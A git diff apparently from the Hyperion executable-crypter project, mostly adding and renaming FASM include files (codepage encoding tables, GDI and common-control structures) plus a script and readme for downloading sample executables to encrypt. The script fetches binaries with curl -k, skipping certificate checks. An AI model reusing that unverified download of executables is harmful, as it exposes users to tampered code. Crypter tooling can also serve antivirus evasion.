diff --git a/binary/hyperion/source/Examples/fetch_binaries.sh b/binary/hyperion/source/Examples/fetch_binaries.sh
new file mode 100755
index 0000000..b75c727
--- /dev/null
+++ b/binary/hyperion/source/Examples/fetch_binaries.sh
@@ -0,0 +1,6 @@
+#!/bin/sh
+set -e
+curl https://www.dropbox.com/s/6bbtntpywxm0wz0/example_binaries.tar.gz?dl=1 -o examples.tar.gz -J -L -k
+gzip -d examples.tar.gz
+tar -xvf examples.tar
+rm examples.tar
diff --git a/binary/hyperion/source/Examples/helloworld.exe b/binary/hyperion/source/Examples/helloworld.exe
deleted file mode 100644
index 9c66691..0000000
Binary files a/binary/hyperion/source/Examples/helloworld.exe and /dev/null differ
diff --git a/binary/hyperion/source/Examples/readme.txt b/binary/hyperion/source/Examples/readme.txt
new file mode 100644
index 0000000..95517ee
--- /dev/null
+++ b/binary/hyperion/source/Examples/readme.txt
@@ -0,0 +1,16 @@
+Please use "fetch_binaries.sh" to download
+several test executables which can be encrypted 
+with hyperion:
+
+- helloworld_gui_asm.exe: 32 bit, opens MessageBoxA,
+  written with fasm
+- helloworld64_gui_asm.exe: 64 bit, opens MessageBoxA,
+  written with fasm
+- helloworld_cmd.exe: 32 bit, hello world printf,
+  written in C, build with mingw
+- helloworld64_cmd.exe: 64 bit, hello world printf,
+  written in C, build with mingw
+- gui_mingw.exe: 32 bit, opens a window, contains menu
+  as ressource, build with mingw
+- gui64_visualstudio.exe: 64 bit, opens a window, contains menu
+  as ressource, build with visualstudio
diff --git a/binary/hyperion/source/Fasm/fasminclude/API/ADVAPI32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/ADVAPI32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/API/ADVAPI32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/API/ADVAPI32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/API/COMCTL32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/COMCTL32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/API/COMCTL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/API/COMCTL32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/API/COMDLG32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/COMDLG32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/API/COMDLG32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/API/COMDLG32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/API/GDI32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/GDI32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/API/GDI32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/API/GDI32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/API/KERNEL32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/KERNEL32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/API/KERNEL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/API/KERNEL32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/API/SHELL32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/SHELL32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/API/SHELL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/API/SHELL32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/API/USER32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/USER32.INC
old mode 100644
new mode 100755
similarity index 97%
rename from binary/hyperion/source/Fasm/fasminclude/API/USER32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/API/USER32.INC
index 7c63e7d..750b2dd
--- a/binary/hyperion/source/Fasm/fasminclude/API/USER32.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/API/USER32.INC
@@ -326,6 +326,8 @@ import user32,\
        GetWindowInfo,'GetWindowInfo',\
        GetWindowLongA,'GetWindowLongA',\
        GetWindowLongW,'GetWindowLongW',\
+       GetWindowLongPtrA,'GetWindowLongPtrA',\
+       GetWindowLongPtrW,'GetWindowLongPtrW',\
        GetWindowModuleFileNameA,'GetWindowModuleFileNameA',\
        GetWindowModuleFileNameW,'GetWindowModuleFileNameW',\
        GetWindowPlacement,'GetWindowPlacement',\
diff --git a/binary/hyperion/source/Fasm/fasminclude/API/WSOCK32.INC b/binary/hyperion/source/Fasm/INCLUDE/API/WSOCK32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/API/WSOCK32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/API/WSOCK32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/UTF8.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/UTF8.INC
old mode 100644
new mode 100755
similarity index 64%
rename from binary/hyperion/source/Fasm/fasminclude/ENCODING/UTF8.INC
rename to binary/hyperion/source/Fasm/INCLUDE/ENCODING/UTF8.INC
index c544c90..fb4f1ed
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/UTF8.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/UTF8.INC
@@ -2,68 +2,66 @@
 ; UTF-8
 
 macro du [arg]
- { local current,char
+ { local current,..input,char
    if arg eqtype ''
     virtual at 0
+     ..input::
      db arg
      count = $
     end virtual
     current = 0
     while current < count
-     virtual at 0
-     db arg
-     load char byte from current
+     load char byte from ..input:current
      wide = char
      current = current + 1
      if char > 0C0h
       if char < 0E0h
        wide = char and 11111b
-       load char byte from current
+       load char byte from ..input:current
        wide = wide shl 6 + (char and 111111b)
        current = current + 1
       else if char < 0F0h
        wide = char and 1111b
-       load char byte from current
+       load char byte from ..input:current
        wide = wide shl 6 + (char and 111111b)
-       load char byte from current+1
+       load char byte from ..input:current+1
        wide = wide shl 6 + (char and 111111b)
        current = current + 2
       else if char < 0F8h
        wide = char and 111b
-       load char byte from current
+       load char byte from ..input:current
        wide = wide shl 6 + (char and 111111b)
-       load char byte from current+1
+       load char byte from ..input:current+1
        wide = wide shl 6 + (char and 111111b)
-       load char byte from current+2
+       load char byte from ..input:current+2
        wide = wide shl 6 + (char and 111111b)
        current = current + 3
       else if char < 0FCh
        wide = char and 11b
-       load char byte from current
+       load char byte from ..input:current
        wide = wide shl 6 + (char and 111111b)
-       load char byte from current+1
+       load char byte from ..input:current+1
        wide = wide shl 6 + (char and 111111b)
-       load char byte from current+2
+       load char byte from ..input:current+2
        wide = wide shl 6 + (char and 111111b)
-       load char byte from current+3
+       load char byte from ..input:current+3
        wide = wide shl 6 + (char and 111111b)
        current = current + 4
       else
        wide = char and 1
-       load char byte from current
+       load char byte from ..input:current
        wide = wide shl 6 + (char and 111111b)
-       load char byte from current+1
+       load char byte from ..input:current+1
        wide = wide shl 6 + (char and 111111b)
-       load char byte from current+2
+       load char byte from ..input:current+2
        wide = wide shl 6 + (char and 111111b)
-       load char byte from current+3
+       load char byte from ..input:current+3
        wide = wide shl 6 + (char and 111111b)
-       load char byte from current+4
+       load char byte from ..input:current+4
        wide = wide shl 6 + (char and 111111b)
        current = current + 5
       end if
      end if
-     end virtual
      if wide < 10000h
       dw wide
      else
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1250.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1250.INC
new file mode 100755
index 0000000..6769061
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1250.INC
@@ -0,0 +1,36 @@
+
+; Windows 1250
+
+rept 1 { local ..encoding
+	 __encoding equ ..encoding }
+
+virtual at 0
+  __encoding::
+    times 80h dw %-1
+    dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,160h,2039h,15Ah,164h,17Dh,179h
+    dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,161h,203Ah,15Bh,165h,17Eh,17Ah
+    dw 0A0h,2C7h,2D8h,141h,0A4h,104h,0A6h,0A7h,0A8h,0A9h,15Eh,0ABh,0ACh,0ADh,0AEh,17Bh
+    dw 0B0h,0B1h,2DBh,142h,0B4h,0B5h,0B6h,0B7h,0B8h,105h,15Fh,0BBh,13Dh,2DDh,13Eh,17Ch
+    dw 154h,0C1h,0C2h,102h,0C4h,139h,106h,0C7h,10Ch,0C9h,118h,0CBh,11Ah,0CDh,0CEh,10Eh
+    dw 110h,143h,147h,0D3h,0D4h,150h,0D6h,0D7h,158h,16Eh,0DAh,170h,0DCh,0DDh,162h,0DFh
+    dw 155h,0E1h,0E2h,103h,0E4h,13Ah,107h,0E7h,10Dh,0E9h,119h,0EBh,11Bh,0EDh,0EEh,10Fh
+    dw 111h,144h,148h,0F3h,0F4h,151h,0F6h,0F7h,159h,16Fh,0FAh,171h,0FCh,0FDh,163h,2D9h
+end virtual
+
+macro du [arg]
+ { local offset,char
+   offset = $-$$
+   du arg
+   if arg eqtype ''
+    repeat ($-offset-$$)/2
+     load char byte from $$+offset+(%-1)*2
+     if char > 7Fh
+      load char word from __encoding:char*2
+      store word char at $$+offset+(%-1)*2
+     end if
+    end repeat
+   end if }
+
+struc du [args]
+ { common label . word
+   du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1251.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1251.INC
new file mode 100755
index 0000000..95d0da8
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1251.INC
@@ -0,0 +1,33 @@
+
+; Windows 1251
+
+rept 1 { local ..encoding
+	 __encoding equ ..encoding }
+
+virtual at 0
+  __encoding::
+    times 80h dw %-1
+    dw 401h,403h,201Ah,453h,201Eh,2026h,2020h,2021h,20ACh,2030h,409h,2039h,40Ah,40Ch,40Bh,40Fh
+    dw 452h,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,459h,203Ah,45Ah,45Ch,45Bh,45Fh
+    dw 0A0h,40Eh,45Eh,408h,0A4h,490h,0A6h,0A7h,401h,0A9h,404h,0ABh,0ACh,0ADh,0AEh,407h
+    dw 0B0h,0B1h,406h,456h,491h,0B5h,0B6h,0B7h,451h,2116h,454h,0BBh,458h,405h,455h,457h
+    times 40h dw 410h+%-1
+end virtual
+
+macro du [arg]
+ { local offset,char
+   offset = $-$$
+   du arg
+   if arg eqtype ''
+    repeat ($-offset-$$)/2
+     load char byte from $$+offset+(%-1)*2
+     if char > 7Fh
+      load char word from __encoding:char*2
+      store word char at $$+offset+(%-1)*2
+     end if
+    end repeat
+   end if }
+
+struc du [args]
+ { common label . word
+   du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1252.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1252.INC
new file mode 100755
index 0000000..73fac54
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1252.INC
@@ -0,0 +1,31 @@
+
+; Windows 1252
+
+rept 1 { local ..encoding
+	 __encoding equ ..encoding }
+
+virtual at 0
+  __encoding::
+    times 80h dw %-1
+    dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,17D,?
+    dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,17Eh,178h
+    times 60h dw 0A0h+%-1
+end virtual
+
+macro du [arg]
+ { local offset,char
+   offset = $-$$
+   du arg
+   if arg eqtype ''
+    repeat ($-offset-$$)/2
+     load char byte from $$+offset+(%-1)*2
+     if char > 7Fh
+      load char word from __encoding:char*2
+      store word char at $$+offset+(%-1)*2
+     end if
+    end repeat
+   end if }
+
+struc du [args]
+ { common label . word
+   du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1253.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1253.INC
new file mode 100755
index 0000000..8941f8d
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1253.INC
@@ -0,0 +1,33 @@
+
+; Windows 1253
+
+rept 1 { local ..encoding
+	 __encoding equ ..encoding }
+
+virtual at 0
+  __encoding::
+    times 80h dw %-1
+    dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,?,?,?
+    dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,?,?,?
+    dw 0A0h,385h,386h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,?,0ABh,0ACh,0ADh,0AEh,2015h
+    dw 0B0h,0B1h,0B2h,0B3h,384h,0B5h,0B6h,0B7h,288h,389h,38Ah,0BBh,38Ch,0BDh,38Eh,38Fh
+    times 40h dw 390h+%-1
+end virtual
+
+macro du [arg]
+ { local offset,char
+   offset = $-$$
+   du arg
+   if arg eqtype ''
+    repeat ($-offset-$$)/2
+     load char byte from $$+offset+(%-1)*2
+     if char > 7Fh
+      load char word from __encoding:char*2
+      store word char at $$+offset+(%-1)*2
+     end if
+    end repeat
+   end if }
+
+struc du [args]
+ { common label . word
+   du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1254.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1254.INC
new file mode 100755
index 0000000..bf862ab
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1254.INC
@@ -0,0 +1,34 @@
+
+; Windows 1254
+
+rept 1 { local ..encoding
+	 __encoding equ ..encoding }
+
+virtual at 0
+  __encoding::
+    times 80h dw %-1
+    dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,?,?
+    dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,?,178h
+    times 30h dw 0A0h+%-1
+    dw 11Eh,0D1h,0D2h,0D3h,0D4h,0D5h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,130h,15Eh,0DFh
+    times 10h dw 0E0h+%-1
+    dw 11Fh,0F1h,0F2h,0F3h,0F4h,0F5h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,131h,15Fh,0FFh
+end virtual
+
+macro du [arg]
+ { local offset,char
+   offset = $-$$
+   du arg
+   if arg eqtype ''
+    repeat ($-offset-$$)/2
+     load char byte from $$+offset+(%-1)*2
+     if char > 7Fh
+      load char word from __encoding:char*2
+      store word char at $$+offset+(%-1)*2
+     end if
+    end repeat
+   end if }
+
+struc du [args]
+ { common label . word
+   du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1255.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1255.INC
new file mode 100755
index 0000000..77618d7
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1255.INC
@@ -0,0 +1,36 @@
+
+; Windows 1255
+
+rept 1 { local ..encoding
+	 __encoding equ ..encoding }
+
+virtual at 0
+  __encoding::
+    times 80h dw %-1
+    dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,?,?,?,?
+    dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,?,?,?,?
+    dw 0A0h,0A1h,0A2h,0A3h,20AAh,0A5h,0A6h,0A7h,0A8h,0A9h,0D7h,0ABh,0ACh,0ADh,0AEh,0AFh
+    dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0F7h,0BBh,0BCh,0BDh,0BEh,0BFh
+    dw 5B0h,5B1h,5B2h,5B3h,5B4h,5B5h,5B6h,5B7h,5B8h,5B9h,?,5BBh,5BCh,5BDh,5BEh,5BFh
+    dw 5C0h,5C1h,5C2h,5C3h,5F0h,5F1h,5F2h,5F3h,5F4h,?,?,?,?,?,?,?
+    dw 5D0h,5D1h,5D2h,5D3h,5D4h,5D5h,5D6h,5D7h,5D8h,5D9h,5DAh,5DBh,5DCh,5DDh,5DEh,5DFh
+    dw 5E0h,5E1h,5E2h,5E3h,5E4h,5E5h,5E6h,5E7h,5E8h,5E9h,5EAh,?,?,200Eh,200Fh,?
+end virtual
+
+macro du [arg]
+ { local offset,char
+   offset = $-$$
+   du arg
+   if arg eqtype ''
+    repeat ($-offset-$$)/2
+     load char byte from $$+offset+(%-1)*2
+     if char > 7Fh
+      load char word from __encoding:char*2
+      store word char at $$+offset+(%-1)*2
+     end if
+    end repeat
+   end if }
+
+struc du [args]
+ { common label . word
+   du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1256.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1256.INC
new file mode 100755
index 0000000..6634f78
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1256.INC
@@ -0,0 +1,36 @@
+
+; Windows 1256
+
+rept 1 { local ..encoding
+	 __encoding equ ..encoding }
+
+virtual at 0
+  __encoding::
+    times 80h dw %-1
+    dw 20ACh,67Eh,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,679h,2039h,152h,686h,698h,688h
+    dw 6AFh,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,6A9h,2122h,691h,203Ah,153h,200Ch,200Dh,6BAh
+    dw 0A0h,60Ch,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,6BEh,0ABh,0ACh,0ADh,0AEh,0AFh
+    dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
+    dw 6C1h,621h,622h,623h,624h,625h,626h,627h,628h,629h,62Ah,62Bh,62Ch,62Dh,62Eh,62Fh
+    dw 630h,631h,632h,633h,634h,635h,636h,0D7h,637h,638h,639h,63Ah,640h,641h,642h,643h
+    dw 0E0h,644h,0E2h,645h,646h,647h,648h,0E7h,0E8h,0E9h,0EAh,0EBh,649h,64Ah,0EEh,0EFh
+    dw 64Bh,64Ch,64Dh,64Eh,0F4h,64Fh,650h,0F7h,651h,0F9h,652h,0FBh,0FCh,200Eh,200Fh,6D2h
+end virtual
+
+macro du [arg]
+ { local offset,char
+   offset = $-$$
+   du arg
+   if arg eqtype ''
+    repeat ($-offset-$$)/2
+     load char byte from $$+offset+(%-1)*2
+     if char > 7Fh
+      load char word from __encoding:char*2
+      store word char at $$+offset+(%-1)*2
+     end if
+    end repeat
+   end if }
+
+struc du [args]
+ { common label . word
+   du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1257.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1257.INC
new file mode 100755
index 0000000..e4f9a41
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1257.INC
@@ -0,0 +1,36 @@
+
+; Windows 1257
+
+rept 1 { local ..encoding
+	 __encoding equ ..encoding }
+
+virtual at 0
+  __encoding::
+    times 80h dw %-1
+    dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,0A8h,2C7h,0B8h
+    dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,0AFh,2DBh,?
+    dw 0A0h,?,0A2h,0A3h,0A4h,?,0A6h,0A7h,0D8h,0A9h,156h,0ABh,0ACh,0ADh,0AEh,0C6h
+    dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0F8h,0B9h,157h,0BBh,0BCh,0BDh,0BEh,0E6h
+    dw 104h,12Eh,100h,106h,0C4h,0C5h,118h,112h,10Ch,0C9h,179h,116h,122h,136h,12Ah,13Bh
+    dw 160h,143h,145h,0D3h,14Ch,0D5h,0D6h,0D7h,172h,141h,15Ah,16Ah,0DCh,17Bh,17Dh,0DFh
+    dw 105h,12Fh,101h,107h,0E4h,0E5h,119h,113h,10Dh,0E9h,17Ah,117h,123h,137h,12Bh,13Ch
+    dw 161h,144h,146h,0F3h,14Dh,0F5h,0F6h,0F7h,173h,142h,15Bh,16Bh,0FCh,17Ch,17Eh,2D9h
+end virtual
+
+macro du [arg]
+ { local offset,char
+   offset = $-$$
+   du arg
+   if arg eqtype ''
+    repeat ($-offset-$$)/2
+     load char byte from $$+offset+(%-1)*2
+     if char > 7Fh
+      load char word from __encoding:char*2
+      store word char at $$+offset+(%-1)*2
+     end if
+    end repeat
+   end if }
+
+struc du [args]
+ { common label . word
+   du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1258.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1258.INC
new file mode 100755
index 0000000..e524748
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN1258.INC
@@ -0,0 +1,36 @@
+
+; Windows 1258
+
+rept 1 { local ..encoding
+	 __encoding equ ..encoding }
+
+virtual at 0
+  __encoding::	    
+    times 80h dw %-1
+    dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,152h,?,?,?
+    dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,153h,?,?,178h
+    dw 0A0h,0A1h,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,0AAh,0ABh,0ACh,0ADh,0AEh,0AFh
+    dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
+    dw 0C0h,0C1h,0C2h,102h,0C4h,0C5h,0C6h,0C7h,0C8h,0C9h,0CAh,0CBh,300h,0CDh,0CEh,0CFh
+    dw 110h,0D1h,309h,0D3h,0D4h,1A0h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,1AFh,303h,0DFh
+    dw 0E0h,0E1h,0E2h,103h,0E4h,0E5h,0E6h,0E7h,0E8h,0E9h,0EAh,0EBh,301h,0EDh,0EEh,0EFh
+    dw 111h,0F1h,323h,0F3h,0F4h,1A1h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,1B0h,20ABh,0FFh
+end virtual
+
+macro du [arg]
+ { local offset,char
+   offset = $-$$
+   du arg
+   if arg eqtype ''
+    repeat ($-offset-$$)/2
+     load char byte from $$+offset+(%-1)*2
+     if char > 7Fh
+      load char word from __encoding:char*2
+      store word char at $$+offset+(%-1)*2
+     end if
+    end repeat
+   end if }
+
+struc du [args]
+ { common label . word
+   du args }
diff --git a/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN874.INC b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN874.INC
new file mode 100755
index 0000000..5b7833c
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/ENCODING/WIN874.INC
@@ -0,0 +1,31 @@
+
+; Windows 874
+
+rept 1 { local ..encoding
+	 __encoding equ ..encoding }
+
+virtual at 0
+  __encoding::	    
+    times 80h dw %-1
+    dw 20ACh,?,?,?,?,2026h,?,?,?,?,?,?,?,?,?,?
+    dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,?,?,?,?,?,?,?
+    times 60h dw 0E00h+%-1
+end virtual
+
+macro du [arg]
+ { local offset,char
+   offset = $-$$
+   du arg
+   if arg eqtype ''
+    repeat ($-offset-$$)/2
+     load char byte from $$+offset+(%-1)*2
+     if char > 7Fh
+      load char word from __encoding:char*2
+      store word char at $$+offset+(%-1)*2
+     end if
+    end repeat
+   end if }
+
+struc du [args]
+ { common label . word
+   du args }
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL32.INC
old mode 100644
new mode 100755
similarity index 95%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL32.INC
index 56ce029..e275196
--- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL32.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL32.INC
@@ -133,7 +133,7 @@ struct TOOLINFO
   uFlags   dd ?
   hwnd	   dd ?
   uId	   dd ?
-  Rect	   RECT
+  rect	   RECT
   hInst    dd ?
   lpszText dd ?
 ends
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL64.INC
old mode 100644
new mode 100755
similarity index 95%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL64.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL64.INC
index db6dbf0..9c76662
--- a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMCTL64.INC
+++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMCTL64.INC
@@ -68,8 +68,8 @@ struct TBBUTTON
   idCommand dd ?
   fsState   db ?
   fsStyle   db ?,6 dup ?
-  dwData    dd ?
-  iString   dd ?
+  dwData    dq ?
+  iString   dq ?
 ends
 
 struct COLORMAP
@@ -128,14 +128,15 @@ struct REBARBANDINFO
 ends
 
 struct TOOLINFO
-  cbSize   dd ?
-  uFlags   dd ?
-  hwnd	   dq ?
-  uId	   dd ?
-  Rect	   RECT
-	   dd ?
-  hInst    dq ?
-  lpszText dq ?
+  cbSize     dd ?
+  uFlags     dd ?
+  hwnd	     dq ?
+  uId	     dq ?
+  rect	     RECT
+  hInst      dq ?
+  lpszText   dq ?
+  lParam     dq ?
+  lpReserved dq ?
 ends
 
 struct TTHITTESTINFO
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMDLG32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMDLG32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/COMDLG32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMDLG32.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/COMDLG64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMDLG64.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/COMDLG64.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/COMDLG64.INC
diff --git a/binary/hyperion/source/Fasm/fasminclude/EQUATES/GDI32.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/GDI32.INC
old mode 100644
new mode 100755
similarity index 100%
rename from binary/hyperion/source/Fasm/fasminclude/EQUATES/GDI32.INC
rename to binary/hyperion/source/Fasm/INCLUDE/EQUATES/GDI32.INC
diff --git a/binary/hyperion/source/Fasm/INCLUDE/EQUATES/GDI64.INC b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/GDI64.INC
new file mode 100755
index 0000000..f311353
--- /dev/null
+++ b/binary/hyperion/source/Fasm/INCLUDE/EQUATES/GDI64.INC
@@ -0,0 +1,480 @@
+
+; GDI32.DLL structures and constants
+
+struct SIZE
+  cx dd ?
+  cy dd ?
+ends
+
+struct BITMAP
+  bmType       dd ?
+  bmWidth      dd ?
+  bmHeight     dd ?
+  bmWidthBytes dd ?
+  bmPlanes     dw ?
+  bmBitsPixel  dw ?,?,?
+  bmBits       dq ?
+ends
+
+struct BITMAPCOREHEADER
+  bcSize     dd ?
+  bcWidth    dw ?
+  bcHeight   dw ?
+  bcPlanes   dw ?
+  bcBitCount dw ?
+ends
+
+struct BITMAPINFOHEADER
+  biSize	  dd ?
+  biWidth	  dd ?
+  biHeight	  dd ?
+  biPlanes	  dw ?
+  biBitCount	  dw ?
+  biCompression   dd ?
+  biSizeImage	  dd ?
+  biXPelsPerMeter dd ?
+  biYPelsPerMeter dd ?
+  biClrUsed	  dd ?
+  biClrImportant  dd ?
+ends
+
+struct BITMAPFILEHEADER
+  bfType      dw ?
+  bfSize      dd ?
+  bfReserved1 dw ?
+  bfReserved2 dw ?
+  bfOffBits   dd ?
+ends
+
+struct TEXTMETRIC
+  tmHeight	     dd ?
+  tmAscent	     dd ?
+  tmDescent	     dd ?
+  tmInternalLeading  dd ?
+  tmExternalLeading  dd ?
+  tmAveCharWidth     dd ?
+  tmMaxCharWidth     dd ?
+  tmWeight	     dd ?
+  tmOverhang	     dd ?
+  tmDigitizedAspectX dd ?
+  tmDigitizedAspectY dd ?
+  tmFirstChar	     TCHAR ?
+  tmLastChar	     TCHAR ?
+  tmDefaultChar      TCHAR ?
+  tmBreakChar	     TCHAR ?
+  tmItalic	     db ?
+  tmUnderlined	     db ?
+  tmStruckOut	     db ?
+  tmPitchAndFamily   db ?
+  tmCharSet	     db ?
+ends
+
+struct LOGBRUSH
+  lbStyle dd ?
+  lbColor dd ?
+  lbHatch dd ?
+ends
+
+struct LOGPEN
+  lopnStyle dd ?
+  lopnWidth POINT
+  lopnColor dd ?
+ends
+
+struct EXTLOGPEN
+  elpPenStyle	dd ?
+  elpWidth	dd ?
+  elpBrushStyle dd ?
+  elpColor	dd ?
+  elpHatch	dd ?
+  elpNumEntries dd ?
+  elpStyleEntry dd ?
+ends
+
+struct LOGFONT
+  lfHeight	   dd ?
+  lfWidth	   dd ?
+  lfEscapement	   dd ?
+  lfOrientation    dd ?
+  lfWeight	   dd ?
+  lfItalic	   db ?
+  lfUnderline	   db ?
